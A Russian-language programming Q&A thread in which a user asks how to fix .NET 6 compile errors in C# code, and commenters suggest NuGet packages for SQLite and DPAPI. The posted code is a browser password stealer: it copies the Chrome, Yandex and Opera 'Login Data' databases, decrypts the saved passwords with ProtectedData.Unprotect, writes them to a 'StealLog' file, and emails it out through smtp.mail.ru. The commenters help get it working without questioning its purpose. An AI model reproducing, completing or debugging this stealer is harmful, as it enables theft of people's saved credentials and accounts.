# Ошибка CS0234 Тип или имя пространства имен "SQlite" не существует в пространстве имен "System.Data" (возможно, отсутствует ссылка на сборку)

Tags: c#, sqlite, .net-6

Нету ссылок на проект System.Security и на SQLite. Вручную добавить не смог ,подскажите, пожалуйста, как можно исправить эти ошибки. P.S проектная работа по информационной безопасности.

Ошибка  CS0234  Тип или имя пространства имен "SQlite" не существует в пространстве имен "System.Data" (возможно, отсутствует ссылка на сборку).

Ошибка  CS1069  Не удалось найти имя типа "ProtectedData" в пространстве имен "System.Security.Cryptography". Этот тип был отправлен в сборку "System.Security.Cryptography.ProtectedData, Version=0.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a". Попробуйте добавить ссылку на эту сборку.

```
 class Program
{
    static void Main(string[] args)
    {
        Directory.CreateDirectory(Path.GetTempPath() + "StealLog");

        string[] paths ={
                           Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data",
                           Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Yandex\YandexBrowser\User Data\Default\Login Data",
                           Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Opera Software\Opera Stable\Login Data"
                       };
        string pwd_text = " ";
        foreach (string p in paths)
        {
            var pas = Passwords.ReadPass(p);
            if (File.Exists(p))
            {
                pwd_text += "-----------\r\n\r\n";
                foreach (var item in pas)
                {
                    if ((item.Item2.Length > 0) && (item.Item2.Length > 0))
                    {
                        pwd_text += "URL: " + item.Item1 + "\r\n" + "Login: " + item.Item2 + "\r\n" + "Password: " + item.Item3 + "\r\n";
                        pwd_text += " \r\n";
                    }
                }
            }
        }
        if (File.Exists(Path.GetTempPath() + @"StealLog\Login Data"))
        {
            File.Delete(Path.GetTempPath() + @"StealLog\Login Data");
        }
        File.WriteAllText(Path.GetTempPath() + @"StealLog\Passwords.txt", pwd_text);

        SmtpClient Smtp = new SmtpClient("smtp.mail.ru", 587);

        Smtp.Credentials = new NetworkCredential("---------", "--------");


        Smtp.EnableSsl = true;
        MailMessage Message = new MailMessage();
        Message.From = new MailAddress("--------");
        Message.To.Add("---------");
        Message.Subject = "-----------";
        Message.Body = "---------";
        new Attachment(Path.GetTempPath() + @"\Passwords.txt");
        Smtp.Send(Message);

    }
}
```

}

```
class Passwords
{

    static public IEnumerable<Tuple<string, string, string>> ReadPass(string dbPath)
    {
        if (File.Exists(Path.GetTempPath() + @"StealLog\Login Data"))
        {
            File.Delete(Path.GetTempPath() + @"StealLog\Login Data");
        }
        File.Copy(dbPath, Path.GetTempPath() + @"StealLog\Login Data");
        dbPath = Path.GetTempPath() + @"StealLog\Login Data";
        var connectionString = "Data Source=" + dbPath + ";pooling=false";

        using (var conn = new System.Data.SQlite.SQLiteConnection(connectionString))
        using (var cmd = conn.CreateCommand())
        {


            cmd.CommandText = "SELECT password_value,username_value,origin_url FROM logins";

            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                {
                    var encryptedData = (byte[])reader[0];

                    var decodedData = System.Security.Cryptography.ProtectedData.Unprotect(encryptedData, null, System.Security.Cryptography.DataProtectionScope.CurrentUser);   // расшифровка паролей
                    var plainText = Encoding.ASCII.GetString(decodedData);

                    yield return Tuple.Create(reader.GetString(2), reader.GetString(1), plainText);

                }

            }
            conn.Close(); 
        }
    }
}
```

Comment: `ProtectedData` - Какая версия .NET? DPAPI штатно доступна только в устаревшем .NET Framework 4.x, в новых версиях .NET надо ставить NuGet пакет **System.Security.Cryptography.ProtectedData**

Comment: `SQLite` - возможно стоит поставить NuGet пакет **System.Data.SQLite**, но я не проверял.

Comment: я поставил пакет нугет и ссылка все равно не появилась

Comment: Ссылка и не должна появиться, ошибки должны пропасть. В .NET Core управляемые библиотеки в проект подключаются, а не в референсы. В референсы подключаются только SDK и нативные библиотеки. Но вы так и не ответили на вопрос, заданный выше.

Comment: >у меня .NET 6.0

Comment: я нашел пакет нугет System.Security.Cryptography.ProtectedData и ошибка исправилась)

Comment: теперь осталась вторая Ошибка CS0234 Тип или имя пространства имен "SQlite" не существует в пространстве имен "System.Data"